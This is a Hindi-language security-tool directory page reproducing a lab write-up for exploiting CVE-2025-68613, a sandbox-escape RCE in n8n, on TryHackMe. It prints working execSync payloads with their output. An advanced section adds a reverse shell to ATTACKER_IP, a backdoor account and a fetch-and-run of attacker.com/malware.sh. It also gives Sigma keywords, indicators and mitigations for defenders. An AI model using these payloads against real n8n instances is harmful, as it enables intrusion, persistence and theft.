Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
n8n-cve-2025-68613-thm — CVE-2025-68613 के शोषण के लिए शैक्षिक वॉकथ्रू, जो n8n वर्कफ़्लो ऑटोमेशन में एक महत्वपूर्ण RCE है। इसमें एक्सप्रेशन इंजेक्शन, सैंडबॉक्स एस्केप, पेलोड डेवलपमेंट और TryHackMe लैब के माध्यम से डिटेक्शन रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/khin-96/n8n-cve-2025-68613-thm
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षाघटना प्रतिक्रियापेलोड डेवलपमेंटलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubkhin-96/n8n-cve-2025-68613-thm

n8n-cve-2025-68613-thm

CVE-2025-68613 के शोषण के लिए शैक्षिक वॉकथ्रू, जो n8n वर्कफ़्लो ऑटोमेशन में एक महत्वपूर्ण RCE है। इसमें एक्सप्रेशन इंजेक्शन, सैंडबॉक्स एस्केप, पेलोड डेवलपमेंट और TryHackMe लैब के माध्यम से डिटेक्शन रणनीतियाँ शामिल हैं।

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-68613 – n8n महत्वपूर्ण RCE शोषण

अवलोकन

यह रिपॉजिटरी CVE-2025-68613 (CVSS 9.9) के हाथों-हाथ शोषण का दस्तावेज़ीकरण करती है, जो n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म (संस्करण 0.211.0 से 1.120.3) को प्रभावित करने वाली एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता है।

यह शोषण नैतिक रूप से एक नियंत्रित TryHackMe प्रयोगशाला वातावरण में केवल शैक्षिक उद्देश्यों के लिए किया गया था।


भेद्यता सारांश

फ़ील्डमान
CVE IDCVE-2025-68613
CVSS स्कोर9.9 (गंभीर)
प्रकाशित19 दिसंबर, 2025
प्रभावित उत्पादn8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म
भेद्यता प्रकारएक्सप्रेशन इंजेक्शन → सैंडबॉक्स एस्केप → RCE
हमला वेक्टरप्रमाणित उपयोगकर्ता (डिफ़ॉल्ट)
पैच किए गए संस्करण1.120.4, 1.121.1, 1.122.0+
प्रभावित संस्करण0.211.0 - 1.120.3

n8n क्या है?

n8n एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को कार्य स्वचालन के लिए अनुप्रयोगों और सेवाओं को दृश्य रूप से जोड़ने की अनुमति देता है। इसमें निम्नलिखित विशेषताएं शामिल हैं:

  • नोड-आधारित वर्कफ़्लो आर्किटेक्चर: प्रत्येक नोड एक क्रिया का प्रतिनिधित्व करता है (API अनुरोध, डेटा प्रोसेसिंग, ईमेल, आदि)
  • 400+ मूल एकीकरण: विभिन्न APIs और सेवाओं के लिए पूर्व-निर्मित कनेक्टर
  • कोड नोड्स: कस्टम जावास्क्रिप्ट या पायथन कोड निष्पादन
  • एक्सप्रेशन मूल्यांकन: {{ }} में लिपटे गतिशील एक्सप्रेशन जावास्क्रिप्ट के रूप में मूल्यांकित होते हैं

तैनाती मॉडल

  • स्वयं-होस्टेड इंस्टेंस (ऑन-प्रिमाइसेस या प्राइवेट क्लाउड)
  • क्लाउड-होस्टेड (n8n.cloud) प्रबंधित सेवा
  • कॉर्पोरेट नेटवर्क के भीतर आंतरिक ऑटोमेशन टूल

तकनीकी पृष्ठभूमि

भेद्यता श्रृंखला

भेद्यता n8n के वर्कफ़्लो एक्सप्रेशन मूल्यांकन प्रणाली में निहित है। जब प्रमाणित उपयोगकर्ता वर्कफ़्लो कॉन्फ़िगर करते हैं, तो उनका इनपुट पर्याप्त सैंडबॉक्सिंग के बिना जावास्क्रिप्ट कोड के रूप में संसाधित होता है।

संदर्भ वृद्धि श्रृंखला

root@kitploit:~
Expression Sandbox
    ↓ ('this' के माध्यम से भागना)
Node.js Global Context
    ↓ (mainModule तक पहुंच)
Module System (require)
    ↓ (child_process लोड करना)
System Command Execution

प्रमुख खामियां

  1. असुरक्षित एक्सप्रेशन मूल्यांकन: {{ }} में लिपटे उपयोगकर्ता एक्सप्रेशन बिना उचित संदर्भ अलगाव के कच्चे जावास्क्रिप्ट के रूप में मूल्यांकित होते हैं
  2. सैंडबॉक्स एस्केप: this ऑब्जेक्ट तक पहुंच इच्छित सैंडबॉक्स प्रतिबंधों से भागने की अनुमति देती है
  3. अप्रतिबंधित मॉड्यूल पहुंच: process.mainModule.require() Node.js मॉड्यूल सिस्टम तक पहुंच प्रदान करता है
  4. खतरनाक मॉड्यूल लोडिंग: सिस्टम कमांड निष्पादन के लिए child_process मॉड्यूल लोड कर सकता है
  5. कोई सार्थक प्रमाणीकरण सुरक्षा नहीं: कोई भी प्रमाणित उपयोगकर्ता भेद्यता का शोषण कर सकता है

शोषण पेलोड विवरण

root@kitploit:~
(function(){ 
  return this.process.mainModule.require('child_process').execSync('COMMAND').toString() 
})()

व्याख्या:

  • this → Node.js वैश्विक ऑब्जेक्ट
  • this.process → Node.js प्रक्रिया ऑब्जेक्ट
  • process.mainModule → n8n एप्लिकेशन का रूट मॉड्यूल
  • .require('child_process') → सिस्टम कमांड निष्पादन मॉड्यूल लोड करें
  • .execSync('COMMAND') → शेल कमांड को समकालिक रूप से निष्पादित करें
  • .toString() → Buffer आउटपुट को पठनीय स्ट्रिंग में बदलें

शोषण वॉकथ्रू

चरण 1: प्रमाणीकरण

कमजोर n8n इंस्टेंस तक पहुंचें और मान्य क्रेडेंशियल्स के साथ लॉगिन करें।

प्रयोगशाला क्रेडेंशियल्स:

  • ईमेल: [email protected]
  • पासवर्ड: Try12345!

Login Screen


चरण 2: स्वागत और वर्कफ़्लो निर्माण

लॉगिन के बाद, आपको वर्कफ़्लो निर्माण इंटरफ़ेस प्रस्तुत किया जाता है। एक नया वर्कफ़्लो शुरू करने के लिए "Start from scratch" पर क्लिक करें।

Welcome Screen


चरण 3: मैनुअल ट्रिगर जोड़ें

"Add first step" पर क्लिक करें और "Manual Trigger" खोजें। यह नोड वर्कफ़्लो निष्पादन के लिए प्रवेश बिंदु के रूप में कार्य करता है।

Manual Trigger Setup

उद्देश्य: मैनुअल ट्रिगर नोड UI में "Execute workflow" बटन के माध्यम से वर्कफ़्लो के मैन्युअल निष्पादन की अनुमति देता है, जो परीक्षण के लिए आदर्श है।


चरण 4: वर्कफ़्लो कॉन्फ़िगर करें और फ़ील्ड मैपिंग जोड़ें

फ़ील्ड मैपिंग करने के लिए एक "Edit Fields" नोड जोड़ें। यहीं पर भेद्यता का शोषण किया जाता है।

Workflow Configuration

कॉन्फ़िगरेशन चरण:

  1. एक नई फ़ील्ड मैपिंग जोड़ने के लिए "Add field" पर क्लिक करें
  2. मोड को "Expression" पर सेट करें
  3. यह जावास्क्रिप्ट कोड मूल्यांकन की अनुमति देता है

चरण 5: ID कमांड निष्पादित करें

id कमांड को निष्पादित करने और उपयोगकर्ता/विशेषाधिकार जानकारी प्राप्त करने के लिए पेलोड इंजेक्ट करें।

पेलोड:

root@kitploit:~
(function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })()

परिणाम:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

ID Command Execution

प्राप्त जानकारी:

  • गैर-रूट उपयोगकर्ता के रूप में चल रहा है (uid=1000)
  • समूह सदस्यता (gid=1000)
  • संभावित विशेषाधिकार वृद्धि मार्ग

चरण 6: LS के साथ फ़ाइल सिस्टम की गणना करें

ls कमांड निष्पादित करने और निर्देशिका सामग्री को सूचीबद्ध करने के लिए पेलोड संशोधित करें।

पेलोड:

root@kitploit:~
(function(){ return this.process.mainModule.require('child_process').execSync('ls -la').toString() })()

LS Command Execution

आउटपुट दिखाता है:

  • फ़्लैग फ़ाइल मौजूद: flag.txt
  • निर्देशिका संरचना और फ़ाइल अनुमतियाँ
  • अतिरिक्त टोही डेटा

चरण 7: संवेदनशील डेटा निकालें

शोषण पूरा करने के लिए cat कमांड का उपयोग करके फ़्लैग फ़ाइल पढ़ें।

पेलोड:

root@kitploit:~
(function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })()

फ़्लैग प्राप्त:

root@kitploit:~
THM{n8n_exposed_workflow}

Flag Extraction


उन्नत शोषण तकनीकें

1. रिवर्स शेल

नियंत्रण के लिए इंटरैक्टिव शेल पहुंच स्थापित करें:

root@kitploit:~
(function(){ 
  return this.process.mainModule.require('child_process').execSync('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1').toString() 
})()

2. बैकडोर उपयोगकर्ता बनाएं

निरंतर पहुंच के लिए एक नया सिस्टम उपयोगकर्ता जोड़ें:

root@kitploit:~
(function(){ 
  return this.process.mainModule.require('child_process').execSync('useradd -m -p $(openssl passwd -1 PASSWORD) backdoor').toString() 
})()

3. दुर्भावनापूर्ण पेलोड डाउनलोड करें

दूरस्थ कोड लाएं और निष्पादित करें:

root@kitploit:~
(function(){ 
  return this.process.mainModule.require('child_process').execSync('wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh').toString() 
})()

4. विशेषाधिकार वृद्धि गणना

sudo विशेषाधिकारों की जांच करें:

root@kitploit:~
(function(){ 
  return this.process.mainModule.require('child_process').execSync('sudo -l').toString() 
})()

5. पर्यावरण टोही

पर्यावरण चर निकालें:

root@kitploit:~
(function(){ 
  return this.process.mainModule.require('child_process').execSync('env').toString() 
})()

पहचान रणनीतियाँ

वेब प्रॉक्सी लॉगिंग (Nginx)

विश्लेषण के लिए अपने प्रॉक्सी को अनुरोध निकायों को लॉग करने के लिए कॉन्फ़िगर करें:

root@kitploit:~
http {
    log_format detailed '$remote_addr - $remote_user [$time_local] '
                       '"$request" $status $body_bytes_sent '
                       '"$http_referer" "$http_user_agent" '
                       'Request-Body: "$request_body" '
                       'Duration: $request_time s';
    
    access_log /var/log/nginx/detailed_access.log detailed;
}

सिग्मा पहचान नियम

वर्कफ़्लो API अनुरोधों के माध्यम से शोषण प्रयासों का पता लगाएं:

root@kitploit:~
title: CVE-2025-68613 - n8n एक्सप्रेशन इंजेक्शन RCE
logsource:
    category: web_application_firewall
detection:
    keywords:
        - "process.mainModule.require"
        - "child_process"
        - "execSync"
    condition: keywords
filter:
    field: uri_path
    value: "/rest/workflows"
    method: POST

प्रक्रिया निर्माण निगरानी

n8n द्वारा स्पॉन किए गए संदिग्ध चाइल्ड प्रक्रियाओं की निगरानी करें:

  • अप्रत्याशित child_process स्पॉनिंग पर नज़र रखें
  • रिवर्स शेल कनेक्शन (bash, nc) की निगरानी करें
  • संदिग्ध फ़ाइल डाउनलोड/निष्पादन पर नज़र रखें
  • विशेषाधिकार वृद्धि प्रयासों पर अलर्ट करें

लॉग स्थान

  • n8n लॉग: /root/.n8n/logs/
  • सिस्टम लॉग: /var/log/auth.log, /var/log/syslog
  • वर्कफ़्लो निष्पादन लॉग: n8n डेटाबेस

समझौता संकेतक

  • वर्कफ़्लो फ़ील्ड में संदिग्ध जावास्क्रिप्ट एक्सप्रेशन जिसमें शामिल हैं:
    • process.mainModule
    • require('child_process')
    • execSync या spawn
  • असामान्य child_process निष्पादन
  • अप्रत्याशित वर्कफ़्लो संशोधन
  • सफल पहुंच के बाद विफल लॉगिन प्रयास
  • अप्रत्याशित निर्देशिकाओं में फ़ाइल सिस्टम परिवर्तन

शोषण समयरेखा


शमन और रोकथाम

तत्काल कार्रवाई

  1. n8n को अपडेट करें पैच किए गए संस्करणों में:

    • v1.120.4
    • v1.121.1
    • v1.122.0 या बाद का
  2. नेटवर्क पहुंच प्रतिबंधित करें

    • n8n पहुंच को सीमित करने के लिए फ़ायरवॉल नियम लागू करें
    • प्रशासनिक पहुंच के लिए VPN या बैस्टियन होस्ट का उपयोग करें
    • यदि आवश्यक न हो तो बाहरी एक्सपोज़र अक्षम करें
  3. मजबूत प्रमाणीकरण

    • मजबूत पासवर्ड लागू करें
    • मल्टी-फ़ैक्टर प्रमाणीकरण (MFA) लागू करें
    • जहां संभव हो SSO एकीकरण का उपयोग करें
  4. निगरानी और लॉगिंग

    • सभी n8n गतिविधियों के लिए विस्तृत लॉगिंग सक्षम करें
    • वास्तविक समय में वर्कफ़्लो संशोधनों की निगरानी करें
    • संदिग्ध एक्सप्रेशन के लिए अलर्ट सेट करें

दीर्घकालिक सुरक्षा उपाय

  1. इनपुट सत्यापन और स्वच्छता

    • उपयोगकर्ता इनपुट को कभी भी कोड के रूप में मूल्यांकित न करें
    • एक्सप्रेशन व्हाइटलिस्टिंग लागू करें
    • सभी वर्कफ़्लो परिभाषाओं को स्वच्छ करें
  2. सैंडबॉक्स कार्यान्वयन

    • एक्सप्रेशन मूल्यांकन को प्रतिबंधित सैंडबॉक्स में अलग करें
    • Node.js APIs तक पहुंच सीमित करें
    • अलगाव के लिए वर्चुअल मशीन या कंटेनर का उपयोग करें
  3. न्यूनतम विशेषाधिकार का सिद्धांत

    • n8n को न्यूनतम आवश्यक अनुमतियों के साथ चलाएं
    • फ़ाइल सिस्टम पहुंच प्रतिबंधित करें
    • नेटवर्क कनेक्टिविटी सीमित करें
  4. कोड समीक्षा और सुरक्षा परीक्षण

    • कस्टम नोड्स के नियमित सुरक्षा ऑडिट
    • SAST/DAST टूल लागू करें
    • खतरे मॉडलिंग अभ्यास आयोजित करें

संदर्भ

  • n8n आधिकारिक दस्तावेज़
  • n8n सुरक्षा नीति
  • Node.js चाइल्ड प्रोसेस मॉड्यूल
  • OWASP कोड इंजेक्शन
  • CWE-95: गतिशील रूप से मूल्यांकित कोड में निर्देशों का अनुचित तटस्थीकरण
  • CVSS v3.1 कैलकुलेटर

प्रयोगशाला जानकारी

  • प्लेटफ़ॉर्म: TryHackMe
  • कमरा: n8n: CVE-2025-68613
  • कमरा URL: https://tryhackme.com/room/n8ncve202568613
  • कठिनाई: मध्यम से कठिन
  • सीखने के उद्देश्य: एक्सप्रेशन इंजेक्शन, सैंडबॉक्स एस्केप, RCE, पहचान रणनीतियाँ

अस्वीकरण

यह दस्तावेज़ीकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। वर्णित शोषण तकनीकें इसके लिए अभिप्रेत हैं:

  • अधिकृत पेनिट्रेशन परीक्षण
  • नियंत्रित वातावरण में सुरक्षा अनुसंधान
  • TryHackMe प्रयोगशाला अभ्यास
  • सुरक्षा भेद्यताओं को समझना

कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। सुरक्षा परीक्षण करने से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें।


रिपॉजिटरी संरचना

root@kitploit:~
.
├── README.md                    # यह फ़ाइल
├── exploitation-details.md      # तकनीकी गहन गाइड
├── screenshots/
│   ├── 01-login.png
│   ├── 02-Welcome.png
│   ├── 03-Manual_Trigger.png
│   ├── 04-Workflow-setup.png
│   ├── 05-rce_id.png
│   ├── 06-Change_id_ls.png
│   └── rce_cat_flag.png
└── notes/
    └── exploitation-details.md

लेखक नोट्स

यह राइटअप TryHackMe प्रयोगशाला वातावरण में CVE-2025-68613 के सफल शोषण का दस्तावेज़ीकरण करता है। यह भेद्यता सुरक्षित कोड मूल्यांकन के महत्वपूर्ण महत्व और ऑटोमेशन प्लेटफ़ॉर्म में अपर्याप्त सैंडबॉक्स कार्यान्वयन के खतरों को प्रदर्शित करती है।

इस भेद्यता को समझने से आक्रामक सुरक्षा टीमों को समान मुद्दों की पहचान करने और रक्षात्मक टीमों को अधिक प्रभावी पहचान रणनीतियाँ विकसित करने में मदद मिलती है।

टूल डाउनलोड करें
चरणक्रियासमय
1n8n इंस्टेंस तक पहुंचेंसेकंड
2वर्कफ़्लो बनाएं/संशोधित करें< 1 मिनट
3फ़ील्ड मैपिंग नोड जोड़ें< 1 मिनट
4id कमांड इंजेक्ट और निष्पादित करें< 30 सेकंड
5ls के साथ फ़ाइल सिस्टम की गणना करें< 1 मिनट
6cat के साथ डेटा निकालें< 30 सेकंड
कुलपूर्ण RCE शोषण< 5 मिनट